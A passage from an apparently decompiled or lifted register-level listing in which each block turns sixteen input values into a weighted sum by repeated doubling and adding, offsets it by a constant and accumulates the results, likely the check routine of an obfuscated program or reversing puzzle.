r[8] = r[8] + r[8] 1766 | r[3] = r[3] + r[8] 1767 | r[8] = r[8] + r[8] 1768 | r[2] = r[2] + r[3] 1769 | r[3] = 0 1770 | r[8] = i[11] 1771 | r[8] = r[8] + r[8] 1772 | r[3] = r[3] + r[8] 1773 | r[8] = r[8] + r[8] 1774 | r[3] = r[3] + r[8] 1775 | r[8] = r[8] + r[8] 1776 | r[8] = r[8] + r[8] 1777 | r[3] = r[3] + r[8] 1778 | r[8] = r[8] + r[8] 1779 | r[8] = r[8] + r[8] 1780 | r[3] = r[3] + r[8] 1781 | r[8] = r[8] + r[8] 1782 | r[3] = r[3] + r[8] 1783 | r[8] = r[8] + r[8] 1784 | r[2] = r[2] + r[3] 1785 | r[3] = 0 1786 | r[8] = i[12] 1787 | r[8] = r[8] + r[8] 1788 | r[8] = r[8] + r[8] 1789 | r[3] = r[3] + r[8] 1790 | r[8] = r[8] + r[8] 1791 | r[3] = r[3] + r[8] 1792 | r[8] = r[8] + r[8] 1793 | r[3] = r[3] + r[8] 1794 | r[8] = r[8] + r[8] 1795 | r[8] = r[8] + r[8] 1796 | r[3] = r[3] + r[8] 1797 | r[8] = r[8] + r[8] 1798 | r[3] = r[3] + r[8] 1799 | r[8] = r[8] + r[8] 1800 | r[2] = r[2] + r[3] 1801 | r[3] = 0 1802 | r[8] = i[13] 1803 | r[8] = r[8] + r[8] 1804 | r[3] = r[3] + r[8] 1805 | r[8] = r[8] + r[8] 1806 | r[3] = r[3] + r[8] 1807 | r[8] = r[8] + r[8] 1808 | r[3] = r[3] + r[8] 1809 | r[8] = r[8] + r[8] 1810 | r[8] = r[8] + r[8] 1811 | r[3] = r[3] + r[8] 1812 | r[8] = r[8] + r[8] 1813 | r[8] = r[8] + r[8] 1814 | r[3] = r[3] + r[8] 1815 | r[8] = r[8] + r[8] 1816 | r[2] = r[2] + r[3] 1817 | r[3] = 0 1818 | r[8] = i[14] 1819 | r[3] = r[3] + r[8] 1820 | r[8] = r[8] + r[8] 1821 | r[3] = r[3] + r[8] 1822 | r[8] = r[8] + r[8] 1823 | r[3] = r[3] + r[8] 1824 | r[8] = r[8] + r[8] 1825 | r[3] = r[3] + r[8] 1826 | r[8] = r[8] + r[8] 1827 | r[3] = r[3] + r[8] 1828 | r[8] = r[8] + r[8] 1829 | r[8] = r[8] + r[8] 1830 | r[8] = r[8] + r[8] 1831 | r[3] = r[3] + r[8] 1832 | r[8] = r[8] + r[8] 1833 | r[2] = r[2] + r[3] 1834 | r[3] = 0 1835 | r[8] = i[15] 1836 | r[8] = r[8] + r[8] 1837 | r[3] = r[3] + r[8] 1838 | r[8] = r[8] + r[8] 1839 | r[3] = r[3] + r[8] 1840 | r[8] = r[8] + r[8] 1841 | r[8] = r[8] + r[8] 1842 | r[8] = r[8] + r[8] 1843 | r[8] = r[8] + r[8] 1844 | r[3] = r[3] + r[8] 1845 | r[8] = r[8] + r[8] 1846 | r[2] = r[2] + r[3] 1847 | r[0] = r[2] + 111 1848 | r[4] = len(&r[0]) 1849 | r[15] = r[15] + r[4] 1850 | r[2] = 0 1851 | r[3] = 0 1852 | r[8] = i[0] 1853 | r[8] = r[8] + r[8] 1854 | r[8] = r[8] + r[8] 1855 | r[3] = r[3] + r[8] 1856 | r[8] = r[8] + r[8] 1857 | r[8] = r[8] + r[8] 1858 | r[8] = r[8] + r[8] 1859 | r[8] = r[8] + r[8] 1860 | r[3] = r[3] + r[8] 1861 | r[8] = r[8] + r[8] 1862 | r[3] = r[3] + r[8] 1863 | r[8] = r[8] + r[8] 1864 | r[2] = r[2] + r[3] 1865 | r[3] = 0 1866 | r[8] = i[1] 1867 | r[8] = r[8] + r[8] 1868 | r[8] = r[8] + r[8] 1869 | r[8] = r[8] + r[8] 1870 | r[3] = r[3] + r[8] 1871 | r[8] = r[8] + r[8] 1872 | r[3] = r[3] + r[8] 1873 | r[8] = r[8] + r[8] 1874 | r[2] = r[2] + r[3] 1875 | r[3] = 0 1876 | r[8] = i[2] 1877 | r[8] = r[8] + r[8] 1878 | r[3] = r[3] + r[8] 1879 | r[8] = r[8] + r[8] 1880 | r[3] = r[3] + r[8] 1881 | r[8] = r[8] + r[8] 1882 | r[8] = r[8] + r[8] 1883 | r[8] = r[8] + r[8] 1884 | r[3] = r[3] + r[8] 1885 | r[8] = r[8] + r[8] 1886 | r[3] = r[3] + r[8] 1887 | r[8] = r[8] + r[8] 1888 | r[3] = r[3] + r[8] 1889 | r[8] = r[8] + r[8] 1890 | r[2] = r[2] + r[3] 1891 | r[3] = 0 1892 | r[8] = i[3] 1893 | r[3] = r[3] + r[8] 1894 | r[8] = r[8] + r[8] 1895 | r[8] = r[8] + r[8] 1896 | r[3] = r[3] + r[8] 1897 | r[8] = r[8] + r[8] 1898 | r[8] = r[8] + r[8] 1899 | r[3] = r[3] + r[8] 1900 | r[8] = r[8] + r[8] 1901 | r[3] = r[3] + r[8] 1902 | r[8] = r[8] + r[8] 1903 | r[3] = r[3] + r[8] 1904 | r[8] = r[8] + r[8] 1905 | r[2] = r[2] + r[3] 1906 | r[3] = 0 1907 | r[8] = i[4] 1908 | r[3] = r[3] + r[8] 1909 | r[8] = r[8] + r[8] 1910 | r[8] = r[8] + r[8] 1911 | r[3] = r[3] + r[8] 1912 | r[8] = r[8] + r[8] 1913 | r[8] = r[8] + r[8] 1914 | r[8] = r[8] + r[8] 1915 | r[8] = r[8] + r[8] 1916 | r[8] = r[8] + r[8] 1917 | r[3] = r[3] + r[8] 1918 | r[8] = r[8] + r[8] 1919 | r[2] = r[2] + r[3] 1920 | r[3] = 0 1921 | r[8] = i[5] 1922 | r[3] = r[3] + r[8] 1923 | r[8] = r[8] + r[8] 1924 | r[3] = r[3] + r[8] 1925 | r[8] = r[8] + r[8] 1926 | r[3] = r[3] + r[8] 1927 | r[8] = r[8] + r[8] 1928 | r[3] = r[3] + r[8] 1929 | r[8] = r[8] + r[8] 1930 | r[3] = r[3] + r[8] 1931 | r[8] = r[8] + r[8] 1932 | r[3] = r[3] + r[8] 1933 | r[8] = r[8] + r[8] 1934 | r[8] = r[8] + r[8] 1935 | r[3] = r[3] + r[8] 1936 | r[8] = r[8] + r[8] 1937 | r[2] = r[2] + r[3] 1938 | r[3] = 0 1939 | r[8] = i[6] 1940 | r[8] = r[8] + r[8] 1941 | r[3] = r[3] + r[8] 1942 | r[8] = r[8] + r[8] 1943 | r[8] = r[8] + r[8] 1944 | r[3] = r[3] + r[8] 1945 | r[8] = r[8] + r[8] 1946 | r[3] = r[3] + r[8] 1947 | r[8] = r[8] + r[8] 1948 | r[8] = r[8] + r[8] 1949 | r[3] = r[3] + r[8] 1950 | r[8] = r[8] + r[8] 1951 | r[2] = r[2] + r[3] 1952 | r[3] = 0 1953 | r[8] = i[7] 1954 | r[8] = r[8] + r[8] 1955 | r[8] = r[8] + r[8] 1956 | r[3] = r[3] + r[8] 1957 | r[8] = r[8] + r[8] 1958 | r[8] = r[8] + r[8] 1959 | r[3] = r[3] + r[8] 1960 | r[8] = r[8] + r[8] 1961 | r[8] = r[8] + r[8] 1962 | r[3] = r[3] + r[8] 1963 | r[8] = r[8] + r[8] 1964 | r[2] = r[2] + r[3] 1965 | r[3] = 0 1966 | r[8] = i[8] 1967 | r[3] = r[3] + r[8] 1968 | r[8] = r[8] + r[8] 1969 | r[8] = r[8] + r[8] 1970 | r[3] = r[3] + r[8] 1971 | r[8] = r[8] + r[8] 1972 | r[3] = r[3] + r[8] 1973 | r[8] = r[8] + r[8] 1974 | r[3] = r[3] + r[8] 1975 | r[8] = r[8] + r[8] 1976 | r[3] = r[3] + r[8] 1977 | r[8] = r[8] + r[8] 1978 | r[2] = r[2] + r[3] 1979 | r[3] = 0 1980 | r[8] = i[9] 1981 | r[8] = r[8] + r[8] 1982 | r[3] = r[3] + r[8] 1983 | r[8] = r[8] + r[8] 1984 | r[8] = r[8] + r[8] 1985 | r[8] = r[8] + r[8] 1986 | r[3] = r[3] + r[8] 1987 | r[8] = r[8] + r[8] 1988 | r[8] = r[8] + r[8] 1989 | r[3] = r[3] + r[8] 1990 | r[8] = r[8] + r[8] 1991 | r[2] = r[2] + r[3] 1992 | r[3] = 0 1993 | r[8] = i[10] 1994 | r[3] = r[3] + r[8] 1995 | r[8] = r[8] + r[8] 1996 | r[3] = r[3] + r[8] 1997 | r[8] = r[8] + r[8] 1998 | r[8] = r[8] + r[8] 1999 | r[8] = r[8] + r[8] 2000 | r[3] = r[3] + r[8] 2001 | r[8] = r[8] + r[8] 2002 | r[2] = r[2] + r[3] 2003 | r[3] = 0 2004 | r[8] = i[11] 2005 | r[8] = r[8] + r[8] 2006 | r[8] = r[8] + r[8] 2007 | r[8] = r[8] + r[8] 2008 | r[3] = r[3] + r[8] 2009 | r[8] = r[8] + r[8] 2010 | r[3] = r[3] + r[8] 2011 | r[8] = r[8] + r[8] 2012 | r[8] = r[8] + r[8] 2013 | r[3] = r[3] + r[8] 2014 | r[8] = r[8] + r[8] 2015 | r[3] = r[3] + r[8] 2016 | r[8] = r[8] + r[8] 2017 | r[2] = r[2] + r[3] 2018 | r[3] = 0 2019 | r[8] = i[12] 2020 | r[3] = r[3] + r[8] 2021 | r[8] = r[8] + r[8] 2022 | r[8] = r[8] + r[8] 2023 | r[3] = r[3] + r[8] 2024 | r[8] = r[8] + r[8] 2025 | r[3] = r[3] + r[8] 2026 | r[8] = r[8] + r[8] 2027 | r[3] = r[3] + r[8] 2028 | r[8] = r[8] + r[8] 2029 | r[8] = r[8] + r[8] 2030 | r[3] = r[3] + r[8] 2031 | r[8] = r[8] + r[8] 2032 | r[2] = r[2] + r[3] 2033 | r[3] = 0 2034 | r[8] = i[13] 2035 | r[3] = r[3] + r[8] 2036 | r[8] = r[8] + r[8] 2037 | r[3] = r[3] + r[8] 2038 | r[8] = r[8] + r[8] 2039 | r[3] = r[3] + r[8] 2040 | r[8] = r[8] + r[8] 2041 | r[3] = r[3] + r[8] 2042 | r[8] = r[8] + r[8] 2043 | r[3] = r[3] + r[8] 2044 | r[8] = r[8] + r[8] 2045 | r[8] = r[8] + r[8] 2046 | r[3] = r[3] + r[8] 2047 | r[8] = r[8] + r[8] 2048 | r[2] = r[2] + r[3] 2049 | r[3] = 0 2050 | r[8] = i[14] 2051 | r[8] = r[8] + r[8] 2052 | r[8] = r[8] + r[8] 2053 | r[8] = r[8] + r[8] 2054 | r[8] = r[8] + r[8] 2055 | r[8] = r[8] + r[8] 2056 | r[8] = r[8] + r[8] 2057 | r[8] = r[8] + r[8] 2058 | r[3] = r[3] + r[8] 2059 | r[8] = r[8] + r[8] 2060 | r[2] = r[2] + r[3] 2061 | r[3] = 0 2062 | r[8] = i[15] 2063 | r[3] = r[3] + r[8] 2064 | r[8] = r[8] + r[8] 2065 | r[8] = r[8] + r[8] 2066 | r[8] = r[8] + r[8] 2067 | r[8] = r[8] + r[8] 2068 | r[8] = r[8] + r[8] 2069 | r[3] = r[3] + r[8] 2070 | r[8] = r[8] + r[8] 2071 | r[8] = r[8] + r[8] 2072 | r[3] = r[3] + r[8] 2073 | r[8] = r[8] + r[8] 2074 | r[2] = r[2] + r[3] 2075 | r[0] = r[2] + 233 2076 | r[4] = len(&r[0]) 2077 | r[15] = r[15] + r[4] 2078 | r[2] = 0 2079 | r[3] = 0 2080 | r[8] = i[0] 2081 | r[8] = r[8] + r[8] 2082 | r[8] = r[8] + r[8] 2083 | r[8] = r[8] + r[8] 2084 | r[8] = r[8] + r[8] 2085 | r[3] = r[3] + r[8] 2086 | r[8] = r[8] + r[8] 2087 | r[8] = r[8] + r[8] 2088 | r[3] = r[3] + r[8] 2089 | r[8] = r[8] + r[8] 2090 | r[2] = r[2] + r[3] 2091 | r[3] = 0 2092 | r[8] = i[1] 2093 | r[3] = r[3] + r[8] 2094 | r[8] = r[8] + r[8] 2095 | r[3] = r[3] + r[8] 2096 | r[8] = r[8] + r[8] 2097 | r[3] = r[3] + r[8] 2098 | r[8] = r[8] + r[8] 2099 | r[8] = r[8] + r[8] 2100 | r[3] = r[3] + r[8] 2101 | r[8] = r[8] + r[8] 2102 | r[2] = r[2] + r[3] 2103 | r[3] = 0 2104 | r[8] = i[2] 2105 | r[3] = r[3] + r[8] 2106 | r[8] = r[8] + r[8] 2107 | r[8] = r[8] + r[8] 2108 | r[3] = r[3] + r[8] 2109 | r[8] = r[8] + r[8] 2110 | r[8] = r[8] + r[8] 2111 | r[8] = r[8] + r[8] 2112 | r[8] = r[8] + r[8] 2113 | r[8] = r[8] + r[8] 2114 | r[3] = r[3] + r[8] 2115 | r[8] = r[8] + r[8] 2116 | r[2] = r[2] + r[3] 2117 | r[3] = 0 2118 | r[8] = i[3] 2119 | r[3] = r[3] + r[8] 2120 | r[8] = r[8] + r[8] 2121 | r[8] = r[8] + r[8] 2122 | r[8] = r[8] + r[8] 2123 | r[8] = r[8] + r[8] 2124 | r[3] = r[3] + r[8] 2125 | r[8] = r[8] + r[8] 2126 | r[2] = r[2] + r[3] 2127 | r[3] = 0 2128 | r[8] = i[4] 2129 | r[8] = r[8] + r[8] 2130 | r[3] = r[3] + r[8] 2131 | r[8] = r[8] + r[8] 2132 | r[8] = r[8] + r[8] 2133 | r[3] = r[3] + r[8] 2134 | r[8] = r[8] + r[8] 2135 | r[3] = r[3] + r[8] 2136 | r[8] = r[8] + r[8] 2137 | r[3] = r[3] + r[8] 2138 | r[8] = r[8] + r[8] 2139 | r[2] = r[2] + r[3] 2140 | r[3] = 0 2141 | r[8] = i[5] 2142 | r[8] = r[8] + r[8] 2143 | r[3] = r[3] + r[8] 2144 | r[8] = r[8] + r[8] 2145 | r[3] = r[3] + r[8] 2146 | r[8] = r[8] + r[8] 2147 | r[8] = r[8] + r[8] 2148 | r[8] = r[8] + r[8] 2149 | r[8] = r[8] + r[8] 2150 | r[8] = r[8] + r[8] 2151 | r[3] = r[3] + r[8] 2152 | r[8] = r[8] + r[8] 2153 | r[2] = r[2] + r[3] 2154 | r[3] = 0 2155 | r[8] = i[6] 2156 | r[8] = r[8] + r[8] 2157 | r[8] = r[8] + r[8] 2158 | r[3] = r[3] + r[8] 2159 | r[8] = r[8] + r[8] 2160 | r[3] = r[3] + r[8] 2161 | r[8] = r[8] + r[8] 2162 | r[8] = r[8] + r[8] 2163 | r[8] = r[8] + r[8] 2164 | r[3] = r[3] + r[8] 2165 | r[8] = r[8] + r[8] 2166 | r[3] = r[3] + r[8] 2167 | r[8] = r[8] + r[8] 2168 | r[2] = r[2] + r[3] 2169 | r[3] = 0 2170 | r[8] = i[7] 2171 | r[8] = r[8] + r[8] 2172 | r[3] = r[3] + r[8] 2173 | r[8] = r[8] + r[8] 2174 | r[3] = r[3] + r[8] 2175 | r[8] = r[8] + r[8] 2176 | r[3] = r[3] + r[8] 2177 | r[8] = r[8] + r[8] 2178 | r[3] = r[3] + r[8] 2179 | r[8] = r[8] + r[8] 2180 | r[8] = r[8] + r[8] 2181 | r[3] = r[3] + r[8] 2182 | r[8] = r[8] + r[8] 2183 | r[3] = r[3] + r[8] 2184 | r[8] = r[8] + r[8] 2185 | r[2] = r[2] + r[3] 2186 | r[3] = 0 2187 | r[8] = i[8] 2188 | r[3] = r[3] + r[8] 2189 | r[8] = r[8] + r[8] 2190 | r[8] = r[8] + r[8] 2191 | r[3] = r[3] + r[8] 2192 | r[8] = r[8] + r[8] 2193 | r[8] = r[8] + r[8] 2194 | r[3] = r[3] + r[8] 2195 | r[8] = r[8] + r[8] 2196 | r[3] = r[3] + r[8] 2197 | r[8] = r[8] + r[8] 2198 | r[3] = r[3] + r[8] 2199 | r[8] = r[8] + r[8] 2200 | r[3] = r[3] + r[8] 2201 | r[8] = r[8] + r[8] 2202 | r[2] = r[2] + r[3] 2203 | r[3] = 0 2204 | r[8] = i[9] 2205 | r[8] = r[8] + r[8] 2206 | r[3] = r[3] + r[8] 2207 | r[8] = r[8] + r[8] 2208 | r[8] = r[8] + r[8] 2209 | r[8] = r[8] + r[8] 2210 | r[8] = r[8] + r[8] 2211 | r[8] = r[8] + r[8] 2212 | r[3] = r[3] + r[8] 2213 | r[8] = r[8] + r[8] 2214 | r[2] = r[2] + r[3] 2215 | r[3] = 0 2216 | r[8] = i[10] 2217 | r[3] = r[3] + r[8] 2218 | r[8] = r[8] + r[8] 2219 | r[3] = r[3] + r[8] 2220 | r[8] = r[8] + r[8] 2221 | r[3] = r[3] + r[8] 2222 | r[8] = r[8] + r[8] 2223 | r[3] = r[3] + r[8] 2224 | r[8] = r[8] + r[8] 2225 | r[3] = r[3] + r[8] 2226 | r[8] = r[8] + r[8] 2227 | r[8] = r[8] + r[8] 2228 | r[3] = r[3] + r[8] 2229 | r[8] = r[8] + r[8] 2230 | r[3] = r[3] + r[8] 2231 | r[8] = r[8] + r[8] 2232 | r[2] = r[2] + r[3] 2233 | r[3] = 0 2234 | r[8] = i[11] 2235 | r[8] = r[8] + r[8] 2236 | r[8] = r[8] + r[8] 2237 | r[8] = r[8] + r[8] 2238 | r[8] = r[8] + r[8] 2239 | r[8] = r[8] + r[8] 2240 | r[3] = r[3] + r[8] 2241 | r[8] = r[8] + r[8] 2242 | r[3] = r[3] + r[8] 2243 | r[8] = r[8] + r[8] 2244 | r[2] = r[2] + r[3] 2245 | r[3] = 0 2246 | r[8] = i[12] 2247 | r[3] = r[3] + r[8] 2248 | r[8] = r[8] + r[8] 2249 | r[8] = r[8] + r[8] 2250 | r[8] = r[8] + r[8] 2251 | r[3] = r[3] + r[8] 2252 | r[8] = r[8] + r[8] 2253 | r[3] = r[3] + r[8] 2254 | r[8] = r[8] + r[8] 2255 | r[8] = r[8] + r[8] 2256 | r[8] = r[8] + r[8] 2257 | r[3] = r[3] + r[8] 2258 | r[8] = r[8] + r[8] 2259 | r[2] = r[2] + r[3] 2260 | r[3] = 0 2261 | r[8] = i[13] 2262 | r[8] = r[8] + r[8] 2263 | r[8] = r[8] + r[8] 2264 | r[3] = r[3] + r[8] 2265 | r[8] = r[8] + r[8] 2266 | r[3] = r[3] + r[8] 2267 | r[8] = r[8] + r[8] 2268 | r[8] = r[8] + r[8] 2269 | r[8] = r[8] + r[8] 2270 | r[3] = r[3] + r[8] 2271 | r[8] = r[8] + r[8] 2272 | r[2] = r[2] + r[3] 2273 | r[3] = 0 2274 | r[8] = i[14] 2275 | r[3] = r[3] + r[8] 2276 | r[8] = r[8] + r[8] 2277 | r[8] = r[8] + r[8] 2278 | r[3] = r[3] + r[8] 2279 | r[8] = r[8] + r[8] 2280 | r[3] = r[3] + r[8] 2281 | r[8] = r[8] + r[8] 2282 | r[3] = r[3] + r[8] 2283 | r[8] = r[8] + r[8] 2284 | r[3] = r[3] + r[8] 2285 | r[8] = r[8] + r[8] 2286 | r[8] = r[8] + r[8] 2287 | r[3] = r[3] + r[8] 2288 | r[8] = r[8] + r[8] 2289 | r[2] = r[2] + r[3] 2290 | r[3] = 0 2291 | r[8] = i[15] 2292 | r[8] = r[8] + r[8] 2293 | r[8] = r[8] + r[8] 2294 | r[3] = r[3] + r[8] 2295 | r[8] = r[8] + r[8] 2296 | r[2] = r[2] + r[3] 2297 | r[0] = r[2] + 166 2298 | r[4] = len(&r[0]) 2299 | r[15] = r[15] + r[4] 2300 | r[2] = 0 2301 | r[3] = 0 2302 | r[8] = i[0] 2303 | r[8] = r[8] + r[8] 2304 | r[8] = r[8] + r[8] 2305 | r[8] = r[8] + r[8] 2306 | r[8] = r[8] + r[8] 2307 | r[8] = r[8] + r[8] 2308 | r[3] = r[3] + r[8] 2309 | r[8] = r[8] + r[8] 2310 | r[3] = r[3] + r[8] 2311 | r[8] = r[8] + r[8] 2312 | r[2] = r[2] + r[3] 2313 | r[3] = 0 2314 | r[8] = i[1] 2315 | r[8] = r[8] + r[8] 2316 | r[8] = r[8] + r[8] 2317 | r[3] = r[3] + r[8] 2318 | r[8] = r[8] + r[8] 2319 | r[8] = r[8] + r[8] 2320 | r[3] = r[3] + r[8] 2321 | r[8] = r[8] + r[8] 2322 | r[3] = r[3] + r[8] 2323 | r[8] = r[8] + r[8] 2324 | r[3] = r[3] + r[8] 2325 | r[8] = r[8] + r[8] 2326 | r[2] = r[2] + r[3] 2327 | r[3] = 0 2328 | r[8] = i[2] 2329 | r[8] = r[8] + r[8] 2330 | r[3] = r[3] + r[8] 2331 | r[8] = r[8] + r[8] 2332 | r[3] = r[3] + r[8] 2333 | r[8] = r[8] + r[8] 2334 | r[3] = r[3] + r[8] 2335 | r[8] = r[8] + r[8] 2336 | r[8] = r[8] + r[8] 2337 | r[3] = r[3] + r[8] 2338 | r[8] = r[8] + r[8] 2339 | r[3] = r[3] + r[8] 2340 | r[8] = r[8] + r[8] 2341 | r[2] = r[2] + r[3] 2342 | r[3] = 0 2343 | r[8] = i[3] 2344 | r[8] = r[8] + r[8] 2345 | r[3] = r[3] + r[8] 2346 | r[8] = r[8] + r[8] 2347 | r[8] = r[8] + r[8] 2348 | r[8] = r[8] + r[8] 2349 | r[8] = r[8] + r[8] 2350 | r[3] = r[3] + r[8] 2351 | r[8] = r[8] + r[8] 2352 | r[3] = r[3] + r[8] 2353 | r[8] = r[8] + r[8] 2354 | r[3] = r[3] + r[8] 2355 | r[8] = r[8] + r[8] 2356 | r[2] = r[2] + r[3] 2357 | r[3] = 0 2358 | r[8] = i[4] 2359 | r[3] = r[3] + r[8] 2360 | r[8] = r[8] + r[8] 2361 | r[8] = r[8] + r[8] 2362 | r[8] = r[8] + r[8] 2363 | r[3] = r[3] + r[8] 2364 | r[8] = r[8] + r[8] 2365 | r[3] = r[3] + r[8] 2366 | r[8] = r[8] + r[8] 2367 | r[3] = r[3] + r[8] 2368 | r[8] = r[8] + r[8] 2369 | r[2] = r[2] + r[3] 2370 | r[3] = 0 2371 | r[8] = i[5] 2372 | r[8] = r[8] + r[8] 2373 | r[8] = r[8] + r[8] 2374 | r[8] = r[8] + r[8] 2375 | r[8] = r[8] + r[8] 2376 | r[3] = r[3] + r[8] 2377 | r[8] = r[8] + r[8] 2378 | r[3] = r[3] + r[8] 2379 | r[8] = r[8] + r[8] 2380 | r[3] = r[3] + r[8] 2381 | r[8] = r[8] + r[8] 2382 | r[2] = r[2] + r[3] 2383 | r[3] = 0 2384 | r[8] = i[6] 2385 | r[8] = r[8] + r[8] 2386 | r[8] = r[8] + r[8] 2387 | r[3] = r[3] + r[8] 2388 | r[8] = r[8] + r[8] 2389 | r[8] = r[8] + r[8] 2390 | r[8] = r[8] + r[8] 2391 | r[8] = r[8] + r[8] 2392 | r[8] = r[8] + r[8] 2393 | r[3] = r[3] + r[8] 2394 | r[8] = r[8] + r[8] 2395 | r[2] = r[2] + r[3] 2396 | r[3] = 0 2397 | r[8] = i[7] 2398 | r[3] = r[3] + r[8] 2399 | r[8] = r[8] + r[8] 2400 | r[8] = r[8] + r[8] 2401 | r[8] = r[8] + r[8] 2402 | r[3] = r[3] + r[8] 2403 | r[8] = r[8] + r[8] 2404 | r[3] = r[3] + r[8] 2405 | r[8] = r[8] + r[8] 2406 | r[3] = r[3] + r[8] 2407 | r[8] = r[8] + r[8] 2408 | r[8] = r[8] + r[8] 2409 | r[3] = r[3] + r[8] 2410 | r[8] = r[8] + r[8] 2411 | r[2] = r[2] + r[3] 2412 | r[3] = 0 2413 | r[8] = i[8] 2414 | r[8] = r[8] + r[8] 2415 | r[3] = r[3] + r[8] 2416 | r[8] = r[8] + r[8] 2417 | r[8] = r[8] + r[8] 2418 | r[3] = r[3] + r[8] 2419 | r[8] = r[8] + r[8] 2420 | r[8] = r[8] + r[8] 2421 | r[3] = r[3] + r[8] 2422 | r[8] = r[8] + r[8] 2423 | r[3] = r[3] + r[8] 2424 | r[8] = r[8] + r[8] 2425 | r[3] = r[3] + r[8] 2426 | r[8] = r[8] + r[8] 2427 | r[2] = r[2] + r[3] 2428 | r[3] = 0 2429 | r[8] = i[9] 2430 | r[8] = r[8] + r[8] 2431 | r[3] = r[3] + r[8] 2432 | r[8] = r[8] + r[8] 2433 | r[3] = r[3] + r[8] 2434 | r[8] = r[8] + r[8] 2435 | r[3] = r[3] + r[8] 2436 | r[8] = r[8] + r[8] 2437 | r[3] = r[3] + r[8] 2438 | r[8] = r[8] + r[8] 2439 | r[2] = r[2] + r[3] 2440 | r[3] = 0 2441 | r[8] = i[10] 2442 | r[3] = r[3] + r[8] 2443 | r[8] = r[8] + r[8] 2444 | r[3] = r[3] + r[8] 2445 | r[8] = r[8] + r[8] 2446 | r[3] = r[3] + r[8] 2447 | r[8] = r[8] + r[8] 2448 | r[8] = r[8] + r[8] 2449 | r[8] = r[8] + r[8] 2450 | r[3] = r[3] + r[8] 2451 | r[8] = r[8] + r[8] 2452 | r[8] = r[8] + r[8] 2453 | r[3] = r[3] + r[8] 2454 | r[8] = r[8] + r[8] 2455 | r[2] = r[2] + r[3] 2456 | r[3] = 0 2457 | r[8] = i[11] 2458 | r[3] = r[3] + r[8] 2459 | r[8] = r[8] + r[8] 2460 | r[8] = r[8] + r[8] 2461 | r[3] = r[3] + r[8] 2462 | r[8] = r[8] + r[8] 2463 | r[2] = r[2] + r[3] 2464 | r[3] = 0 2465 | r[8] = i[12] 2466 | r[3] = r[3] + r[8] 2467 | r[8] = r[8] + r[8] 2468 | r[3] = r[3] + r[8] 2469 | r[8] = r[8] + r[8] 2470 | r[8] = r[8] + r[8] 2471 | r[3] = r[3] + r[8] 2472 | r[8] = r[8] + r[8] 2473 | r[8] = r[8] + r[8] 2474 | r[3] = r[3] + r[8] 2475 | r[8] = r[8] + r[8] 2476 | r[8] = r[8] + r[8] 2477 | r[3] = r[3] + r[8] 2478 | r[8] = r[8] + r[8] 2479 | r[2] = r[2] + r[3] 2480 | r[3] = 0 2481 | r[8] = i[13] 2482 | r[8] = r[8] + r[8] 2483 | r[3] = r[3] + r[8] 2484 | r[8] = r[8] + r[8] 2485 | r[3] = r[3] + r[8] 2486 | r[8] = r[8] + r[8] 2487 | r[3] = r[3] + r[8] 2488 | r[8] = r[8] + r[8] 2489 | r[3] = r[3] + r[8] 2490 | r[8] = r[8] + r[8] 2491 | r[8] = r[8] + r[8] 2492 | r[3] = r[3] + r[8] 2493 | r[8] = r[8] + r[8] 2494 | r[3] = r[3] + r[8] 2495 | r[8] = r[8] + r[8] 2496 | r[2] = r[2] + r[3] 2497 | r[3] = 0 2498 | r[8] = i[14] 2499 | r[3] = r[3] + r[8] 2500 | r[8] = r[8] + r[8] 2501 | r[8] = r[8] + r[8] 2502 | r[8] = r[8] + r[8] 2503 | r[3] = r[3] + r[8] 2504 | r[8] = r[8] + r[8] 2505 | r[8] = r[8] + r[8] 2506 | r[8] = r[8] + r[8] 2507 | r[8] = r[8] + r[8] 2508 | r[3] = r[3] + r[8] 2509 | r[8] = r[8] + r[8] 2510 | r[2] = r[2] + r[3] 2511 | r[3] = 0 2512 | r[8] = i[15] 2513 | r[8] = r[8] + r[8] 2514 | r[3] = r[3] + r[8] 2515 | r[8] = r[8] + r[8] 2516 | r[3] = r[3] + r[8] 2517 | r[8] = r[8] + r[8] 2518 | r[8] = r[8] + r[8] 2519 | r[3] = r[3] + r[8] 2520 | r[8] = r[8] + r[8] 2521 | r[3] = r[3] + r[8] 2522 | r[8] = r[8] + r[8] 2523 | r[2] = r[2] + r[3] 2524 | r[0] = r[2] + 41 2525 | r[4] = len(&r[0]) 2526 | r[15] = r[15] + r[4] 2527 | r[2] = 0 2528 | r[3] = 0 2529 | r[8] = i[0] 2530 | r[8] = r[8] + r[8] 2531 | r[8] = r[8] + r[8] 2532 | r[3] = r[3] + r[8] 2533 | r[8] = r[8] + r[8] 2534 | r[8] = r[8] + r[8] 2535 | r[8] = r[8] + r[8] 2536 | r[8] = r[8] + r[8] 2537 | r[3] = r[3] + r[8] 2538 | r[8] = r[8] + r[8] 2539 | r[2] = r[2] + r[3] 2540 | r[3] = 0 2541 | r[8] = i[1] 2542 | r[3] = r[3] + r[8] 2543 | r[8] = r[8] + r[8] 2544 | r[3] = r[3] + r[8] 2545 | r[8] = r[8] + r[8] 2546 | r[3] = r[3] + r[8] 2547 | r[8] = r[8] + r[8] 2548 | r[8] = r[8] + r[8] 2549 | r[8] = r[8] + r[8] 2550 | r[8] = r[8] + r[8] 2551 | r[3] = r[3] + r[8] 2552 | r[8] = r[8] + r[8] 2553 | r[2] = r[2] + r[3] 2554 | r[3] = 0 2555 | r[8] = i[2] 2556 | r[3] = r[3] + r[8] 2557 | r[8] = r[8] + r[8] 2558 | r[8] = r[8] + r[8] 2559 | r[3] = r[3] + r[8] 2560 | r[8] = r[8] + r[8] 2561 | r[8] = r[8] + r[8] 2562 | r[8] = r[8] + r[8] 2563 | r[8] = r[8] + r[8] 2564 | r[3] = r[3] + r[8] 2565 | r[8] = r[8] + r[8] 2566 | r[3] = r[3] + r[8] 2567 | r[8] = r[8] + r[8] 2568 | r[2] = r[2] + r[3] 2569 | r[3] = 0 2570 | r[8] = i[3] 2571 | r[3] = r[3] + r[8] 2572 | r[8] = r[8] + r[8] 2573 | r[3] = r[3] + r[8] 2574 | r[8] = r[8] + r[8] 2575 | r[8] = r[8] + r[8] 2576 | r[3] = r[3] + r[8] 2577 | r[8] = r[8] + r[8] 2578 | r[3] = r[3] + r[8] 2579 | r[8] = r[8] + r[8] 2580 | r[8] = r[8] + r[8] 2581 | r[8] = r[8] + r[8] 2582 | r[3] = r[3] + r[8] 2583 | r[8] = r[8] + r[8] 2584 | r[2] = r[2] + r[3] 2585 | r[3] = 0 2586 | r[8] = i[4] 2587 | r[8] = r[8] + r[8] 2588 | r[8] = r[8] + r[8] 2589 | r[8] = r[8] + r[8] 2590 | r[3] = r[3] + r[8] 2591 | r[8] = r[8] + r[8] 2592 | r[3] = r[3] + r[8] 2593 | 